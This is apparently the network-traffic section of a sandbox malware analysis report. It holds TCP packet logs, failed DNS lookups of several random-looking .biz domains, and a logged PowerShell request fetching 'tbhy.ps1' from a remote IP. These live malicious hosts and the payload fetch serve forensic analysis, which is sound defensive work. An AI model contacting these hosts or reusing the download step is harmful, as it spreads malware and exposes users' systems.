                                                                        Dec 12, 2024 07:52:10.253927946 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.254220963 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.254285097 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.258097887 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.258142948 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.258198023 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.259840965 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.260034084 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.260260105 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.262821913 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.263000011 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.263066053 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.265790939 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.265970945 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.266524076 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.269000053 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.269182920 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.269253969 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.271727085 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.271918058 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.271975994 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.274630070 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.274832964 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.274890900 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.277573109 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.277787924 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.278172016 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.280354977 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.280550957 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.280631065 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.283191919 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.283351898 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.283406973 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.285917997 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.286113977 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.286525965 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.288654089 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.288847923 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.289697886 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.291424990 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.291593075 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.291842937 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.294069052 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.294264078 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.294549942 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.296761990 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.296902895 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.297246933 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.299381018 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.299586058 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.299645901 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.301979065 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.302139044 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.302212000 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.304563999 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.304801941 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.304858923 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.307132006 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.307290077 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.307451010 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.309833050 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.309973001 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.310391903 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.312252045 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.312427044 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.312526941 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.314981937 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.315094948 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.315160036 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.317260027 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.317445993 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.317572117 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.318948984 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.319125891 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.319538116 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.320641994 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.320903063 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.320965052 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.322177887 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.322396994 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.322530985 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.323914051 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.324103117 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.324219942 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.325526953 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.325680017 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.325728893 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.327254057 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.327388048 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.327514887 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.328792095 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.368987083 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.972203016 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:12.300673962 CET49737443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:12.300765991 CET44349737172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:12.300852060 CET49737443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:12.304157972 CET49737443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:12.304181099 CET44349737172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:13.534568071 CET44349737172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:13.534646034 CET49737443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:13.537134886 CET49737443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:13.537147045 CET44349737172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:13.537544966 CET44349737172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:13.579935074 CET49737443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:13.579983950 CET49737443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:13.580153942 CET44349737172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:14.256705046 CET44349737172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:14.256968975 CET44349737172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:14.257114887 CET49737443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:14.258313894 CET49737443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:14.258351088 CET44349737172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:14.258366108 CET49737443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:14.258371115 CET44349737172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:14.839428902 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:14.839530945 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:14.839612007 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:14.840392113 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:14.840420008 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.055068970 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.055149078 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.056971073 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.056993008 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.057337046 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.060179949 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.060203075 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.060267925 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.781559944 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.781594038 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.781685114 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.781780005 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.782320976 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.782541990 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.782561064 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.784106016 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.784136057 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.784197092 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.784214020 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.784270048 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.784291983 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.800919056 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.801168919 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.801244020 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.801290035 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.801356077 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.901547909 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.947074890 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.973568916 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.973690987 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.973767042 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.973815918 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.977266073 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.977368116 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.977591991 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.977634907 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:16.977663040 CET49738443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:16.977678061 CET44349738172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:17.015074015 CET49739443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:17.015150070 CET44349739172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:17.015254974 CET49739443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:17.015686035 CET49739443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:17.015702009 CET44349739172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:18.227056980 CET44349739172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:18.227210045 CET49739443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:18.228873968 CET49739443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:18.228903055 CET44349739172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:18.229156971 CET44349739172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:18.230436087 CET49739443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:18.230667114 CET49739443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:18.230703115 CET44349739172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:18.230770111 CET49739443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:18.230779886 CET44349739172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:19.083642006 CET44349739172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:19.083719015 CET44349739172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:19.083775997 CET49739443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:19.096864939 CET49739443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:19.096909046 CET44349739172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:19.134294033 CET49740443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:19.134417057 CET44349740172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:19.134577036 CET49740443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:19.135267973 CET49740443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:19.135304928 CET44349740172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:20.349410057 CET44349740172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:20.349759102 CET49740443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:20.440192938 CET49740443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:20.440247059 CET44349740172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:20.440618038 CET44349740172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:20.444058895 CET49740443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:20.444250107 CET49740443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:20.444277048 CET44349740172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:21.115518093 CET44349740172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:21.115633965 CET44349740172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:21.115833998 CET49740443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:21.115907907 CET49740443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:21.202640057 CET49742443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:21.202707052 CET44349742172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:21.202801943 CET49742443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:21.203371048 CET49742443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:21.203401089 CET44349742172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:22.415234089 CET44349742172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:22.415355921 CET49742443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:22.417685986 CET49742443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:22.417720079 CET44349742172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:22.417989969 CET44349742172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:22.425060987 CET49742443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:22.425251961 CET49742443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:22.425291061 CET44349742172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:22.425379038 CET49742443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:22.425391912 CET44349742172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:23.819184065 CET44349742172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:23.819305897 CET44349742172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:23.819401979 CET49742443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:23.941715002 CET49742443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:23.941792965 CET44349742172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:24.400764942 CET49746443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:24.400827885 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:24.400901079 CET49746443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:24.401420116 CET49746443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:24.401437998 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:25.613548040 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:25.613616943 CET49746443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:25.615461111 CET49746443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:25.615469933 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:25.615814924 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:25.623852968 CET49746443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:25.623945951 CET49746443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:25.623953104 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:26.336821079 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:26.336952925 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:26.337004900 CET49746443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:26.340193987 CET49746443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:26.340209007 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:27.366624117 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:27.366688013 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:27.366770029 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:27.367108107 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:27.367127895 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.578915119 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.579229116 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.580606937 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.580637932 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.580914021 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.591631889 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.592534065 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.592588902 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.592719078 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.592772961 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.592922926 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.592961073 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.594736099 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.594794989 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.598793030 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.598855972 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.602992058 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.603044987 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.603071928 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.603102922 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.603342056 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.603382111 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.603430033 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.606805086 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.606865883 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.647342920 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.650947094 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.651022911 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.651065111 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.651099920 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.651127100 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.651143074 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.651257038 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.651278019 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:32.230478048 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:32.230561018 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:32.230632067 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:32.230818987 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:32.230863094 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:32.236382008 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:32.236433983 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:32.236536026 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:32.236836910 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:32.236871004 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:33.452126980 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:33.452235937 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:33.453651905 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:33.453681946 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:33.454284906 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:33.463505983 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:33.463550091 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:33.463699102 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:34.269310951 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:34.269610882 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:34.269845963 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:34.269891024 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:34.269910097 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:34.269927979 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:34.269936085 CET44349750172.67.206.64192.168.2.4

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 12, 2024 07:52:10.958688974 CET5412353192.168.2.41.1.1.1
                                                                        Dec 12, 2024 07:52:11.187233925 CET53541231.1.1.1192.168.2.4
                                                                        Dec 12, 2024 07:52:11.188817024 CET6536153192.168.2.41.1.1.1
                                                                        Dec 12, 2024 07:52:11.418251038 CET53653611.1.1.1192.168.2.4
                                                                        Dec 12, 2024 07:52:11.432885885 CET5883653192.168.2.41.1.1.1
                                                                        Dec 12, 2024 07:52:11.656316996 CET53588361.1.1.1192.168.2.4
                                                                        Dec 12, 2024 07:52:11.676414967 CET6062053192.168.2.41.1.1.1
                                                                        Dec 12, 2024 07:52:11.897440910 CET53606201.1.1.1192.168.2.4
                                                                        Dec 12, 2024 07:52:11.967952967 CET5895453192.168.2.41.1.1.1
                                                                        Dec 12, 2024 07:52:12.295221090 CET53589541.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 12, 2024 07:52:10.958688974 CET192.168.2.41.1.1.10x51aeStandard query (0)zinc-sneark.bizA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 07:52:11.188817024 CET192.168.2.41.1.1.10x655aStandard query (0)se-blurry.bizA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 07:52:11.432885885 CET192.168.2.41.1.1.10xd2f1Standard query (0)dwell-exclaim.bizA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 07:52:11.676414967 CET192.168.2.41.1.1.10xb777Standard query (0)formy-spill.bizA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 07:52:11.967952967 CET192.168.2.41.1.1.10xe0f2Standard query (0)covery-mover.bizA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 12, 2024 07:52:11.187233925 CET1.1.1.1192.168.2.40x51aeName error (3)zinc-sneark.biznonenoneA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 07:52:11.418251038 CET1.1.1.1192.168.2.40x655aName error (3)se-blurry.biznonenoneA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 07:52:11.656316996 CET1.1.1.1192.168.2.40xd2f1Name error (3)dwell-exclaim.biznonenoneA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 07:52:11.897440910 CET1.1.1.1192.168.2.40xb777Name error (3)formy-spill.biznonenoneA (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 07:52:12.295221090 CET1.1.1.1192.168.2.40xe0f2No error (0)covery-mover.biz172.67.206.64A (IP address)IN (0x0001)false
                                                                        Dec 12, 2024 07:52:12.295221090 CET1.1.1.1192.168.2.40xe0f2No error (0)covery-mover.biz104.21.58.186A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • covery-mover.biz
                                                                        • 45.131.135.227
                                                                        • 147.45.44.131

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.44973245.131.135.227803616C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 07:52:04.226413965 CET167OUTGET /tbhy.ps1 HTTP/1.1
